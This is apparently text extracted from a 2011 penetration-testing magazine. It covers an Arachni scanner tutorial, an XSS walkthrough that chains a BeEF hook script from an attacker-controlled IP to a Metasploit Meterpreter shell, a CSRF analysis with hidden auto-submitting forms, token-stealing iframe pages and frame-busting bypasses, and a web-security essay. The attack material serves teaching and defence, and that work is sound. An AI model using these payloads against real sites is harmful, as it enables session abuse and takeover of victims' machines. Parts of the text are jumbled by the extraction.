$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of the packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually requires recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update RubyGems and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows Explorer to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all the functionality that is available from the command line.
The GUI can be started by executing the following commands:
$ arachni_rpcd amp
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi), or Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, …
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML, or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.

The next steps are to verify the settings in the Settings, Modules and Plug-ins screens. Once you are satisfied, proceed to the Start a Scan screen.

If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).

After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2: Start a Scan screen
WEB APP VULNERABILITIES
Page 26, http://pentestmag.com, 01/2011 (1) November
Listing 3. Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

# Looks for common directories on the server, based on
# wordlists generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger wordlists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited     ||= Set.new
        @@__directories ||= []

        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security'   => 'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' => 'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create Your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.

Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.

Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.

Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.

If there is a directory that needed to be protected and you forgot to protect it, it will be found by a scanner that uses these wordlists.

Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.

Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.

Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).

The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.

Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links to additional information and a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.

Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.

And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this proves that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.

In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can also use on your own web server if you want to try this.
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2: BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.

Figure 1: The user enters a script in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).

Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side, or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).

Click and highlight the zombie in the left pane and then click on Standard Modules - Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).

So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>

As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>

The screenshot below clarifies the above steps (Figure 1).
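The same reflection flaw can be sketched in a few lines of Ruby (an illustrative stand-in for the PHP above; render_search_result is a hypothetical helper, not part of the article's files):

```ruby
# Hypothetical sketch of the vulnerable reflection, mirroring search1.php:
# the "search" parameter is interpolated into the response unencoded.
def render_search_result(params)
  "The parameter passed is #{params['search']}" # no output encoding!
end

payload = "<script>alert(document.domain)</script>"
# The script tag survives intact, so the victim's browser would execute it.
puts render_search_result('search' => payload)
```

Running this shows the attacker's markup passing through the server untouched, which is exactly what makes the reflected XSS possible.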
BeEF - Hook the User's Browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.

I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool; the newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory
Figure 3: Connection with the BeEF controller

Figure 4: What the attacker will see

Figure 5: What the victim will see

Figure 6: Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.

I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all the result of clicking on the various modules available under the Standard Modules menu.

Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).

Detect All Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can talk directly to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7: Detecting plugins on the user's browser

Figure 8: Starting Metasploit

Figure 9: The jobs command

Figure 10: Metasploit after clicking Send Now

Figure 11: Meterpreter window - screenshot 1

Figure 12: Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules - Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).

Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check whether BeEF can talk to Metasploit by running the jobs command (Figure 9).

If the victim's browser is vulnerable to the selected exploit (in this case the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).

Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).

The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.

Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on it. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:

Figure 13: Meterpreter window - screenshot 3

• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output, as in a), must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
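As a minimal sketch of the output-encoding point, Ruby's standard library offers HTML entity encoding (the article's examples use PHP, where htmlspecialchars() plays the same role; this Ruby version is illustrative only):

```ruby
require 'cgi'

payload = "<script>alert(document.domain)</script>"

# Entity-encoding the reflected value neutralizes the markup:
# the browser renders it as inert text instead of executing it.
encoded = CGI.escapeHTML(payload)
puts encoded # => &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

Encoded this way, the earlier alert(document.domain) payload is displayed back to the user rather than run in his browser.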
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
style="display:none">

Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

Only accept POST: This stops simple link-based attacks (IMG, iframes, etc.), but hidden POST requests can be created within frames, scripts, etc.

Referrer checking: Some users prohibit referrers, so you cannot simply require referrer headers. Techniques to selectively create HTTP requests without referrers exist.

Requiring multi-step transactions: CSRF attacks can perform each step in order.

Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)

For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value

Browser settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>

A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to be compared after the form is submitted.

Mechanisms used to subvert one-time tokens usually rely on brute-force attacks. Brute forcing one-time tokens is worthwhile only if the token mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
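An equivalent sketch in Ruby (illustrative, not from the article; valid_token? is a hypothetical helper) generates an unpredictable token with SecureRandom and compares it in constant time so the token cannot be recovered byte-by-byte via timing differences:

```ruby
require 'securerandom'

# Unpredictable per-form token, to be stored in the session server-side
# and echoed into the form's hidden field.
token = SecureRandom.hex(16)

# Constant-time comparison of the session token against the submitted value.
def valid_token?(expected, submitted)
  return false unless expected && submitted
  return false unless expected.bytesize == submitted.bytesize
  diff = 0
  expected.bytes.zip(submitted.bytes) { |a, b| diff |= a ^ b }
  diff.zero?
end

puts valid_token?(token, token)        # => true
puts valid_token?(token, 'guess' * 6)  # => false
```

Note that a cryptographically strong source such as SecureRandom avoids the weakness of predictable seeds that a rand()-based scheme can suffer from.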
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).

Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.

Method 1

<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>

Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
  document.documentElement.style.display = 'block';
} else {
  top.location = self.location;
}
</script>

This protects the web application even if an attacker loads the webpage with JavaScript disabled in the browser.
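A complementary server-side measure, not shown in the article and added here as an assumption about the deployment stack, is to send the X-Frame-Options response header so the browser itself refuses to render the page inside a frame. A minimal Rack-style sketch in Ruby (a plain lambda, no framework required):

```ruby
# Rack-style application that refuses to be framed by sending
# X-Frame-Options: DENY alongside the script-based FrameKiller.
app = lambda do |env|
  headers = {
    'Content-Type'    => 'text/html',
    'X-Frame-Options' => 'DENY' # browser will not render the page in any frame
  }
  [200, headers, ['<html><body>protected page</body></html>']]
end

status, headers, body = app.call({})
puts headers['X-Frame-Options'] # => DENY
```

Unlike script-based frame busting, this header is enforced by the browser before any page script runs, so the double-framing and onbeforeunload bypasses above do not apply to it.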
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting): http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe name="hidden" src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. To facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of (and more powerful) applications that provide the internet user with the required functions as quickly and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried-and-tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and through it to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. A single unsecured web application endangers the security of the systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should be correspondingly higher.

While most companies by now protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for acting anonymously. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away such information freely. The attackers then only have to evaluate this information, and with it they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to bring the security of older web applications up to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. For example, a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that do not use only the session attributes for authentication. In this case it is not straightforward to renew the session ID after login, which makes the application susceptible to Session Fixation.
